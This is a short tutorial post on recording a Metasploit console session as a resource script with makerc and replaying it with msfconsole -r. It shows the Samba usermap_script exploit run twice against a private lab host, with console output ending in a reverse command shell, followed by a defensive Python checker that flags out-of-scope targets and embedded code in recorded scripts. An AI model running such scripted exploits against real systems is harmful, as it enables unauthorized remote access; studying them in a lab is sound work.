0x09 Recording a simple attack script

2018-12-06  Gatociego

This is done with makerc, which simply records the commands typed into the console. Commands unrelated to the attack are recorded as well.

msf > workspace book
[*] Workspace: book

msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.10.123  00:0c:29:86:6d:33        Linux               2.6.X  server
192.168.10.254  00:0c:29:7f:de:c9        Linux               2.6.X  server

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5P2uS1mnOkS0zxL6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "5P2uS1mnOkS0zxL6\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:54428) at 2018-12-06 08:19:15 -0500

^Z
Background session 1? [y/N]  y
# Running this command saves every command entered since msfconsole was started; afterwards, just delete the unrelated commands from the saved file
msf exploit(multi/samba/usermap_script) > makerc check_samba.rc
[*] Saving last 14 commands to check_samba.rc ...

View the recorded contents

# cat check_samba.rc
# The script contains superfluous commands; you can delete them by hand
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit

How to use the recorded script

msfconsole -q -r check_samba.rc

-q  do not display the long, fancy Metasploit banner at startup
-r  followed by the recorded script

# The result is as follows
[*] Processing check_samba.rc for ERB directives.
resource (check_samba.rc)> workspace book
[*] Workspace: book
resource (check_samba.rc)> hosts

Hosts
=====

address         mac                name  os_name     os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------     ---------  -----  -------  ----  --------
192.168.10.122  00:0c:29:67:b8:28        Windows XP                    client
192.168.10.123  00:0c:29:86:6d:33        Linux                  2.6.X  server
192.168.10.128  00:0c:29:f7:89:a7        Windows XP                    client
192.168.10.254  00:0c:29:7f:de:c9        Linux                  2.6.X  server

resource (check_samba.rc)> use exploit/multi/samba/usermap_script
resource (check_samba.rc)> show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


resource (check_samba.rc)> set rhost 192.168.10.254
rhost => 192.168.10.254
resource (check_samba.rc)> exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xQRN0G6H4nZxw9Jr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xQRN0G6H4nZxw9Jr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:56845) at 2018-12-06 08:28:16 -0500

# At this point there is already a shell session on the target
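
Because msfconsole -r replays every recorded line, including exploit, and first processes the file for ERB directives, a recorded file is worth reviewing before it is run. The following is an added example, not part of the original post: review_rc, the authorized range and the last two sample lines are assumptions made for illustration.

```python
import ipaddress

# Constructed sample: the six lines recorded on this page, plus two lines
# added for this demonstration (an out-of-scope target and an ERB directive).
SAMPLE_RC = """\
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit
set rhost 10.0.0.5
setg LHOST <%= ENV['LAB_LHOST'] %>
"""

AUTHORIZED = [ipaddress.ip_network("192.168.10.0/24")]  # assumption: lab scope
DISPLAY_ONLY = {"hosts", "services", "show options"}    # lines that only print

def review_rc(text, authorized=AUTHORIZED):
    """Summarize what replaying a recorded resource script would do."""
    report = {"kept": [], "modules": [], "targets": [], "out_of_scope": [],
              "launches": 0, "embedded_code": []}
    for lineno, raw in enumerate(text.splitlines(), 1):
        words = raw.split()
        if not words or words[0].startswith("#"):
            continue
        if " ".join(words).lower() in DISPLAY_ONLY:
            continue  # recorded noise the page suggests deleting by hand
        report["kept"].append(raw.strip())
        cmd = words[0].lower()
        if "<%" in raw or "<ruby>" in raw.lower():
            report["embedded_code"].append(lineno)  # Ruby runs on the operator host
        elif cmd == "use" and len(words) > 1:
            report["modules"].append(words[1])
        elif cmd in ("set", "setg") and len(words) > 2 and words[1].lower() in ("rhost", "rhosts"):
            for value in words[2:]:
                report["targets"].append(value)
                try:
                    ok = any(ipaddress.ip_address(value) in n for n in authorized)
                except ValueError:
                    ok = False  # hostnames and ranges need manual review
                if not ok:
                    report["out_of_scope"].append((lineno, value))
        elif cmd in ("exploit", "run"):
            report["launches"] += 1
    return report

if __name__ == "__main__":
    print(review_rc(SAMPLE_RC))
```

A non-empty out_of_scope or embedded_code list is the signal to stop and read the file by hand before replaying it.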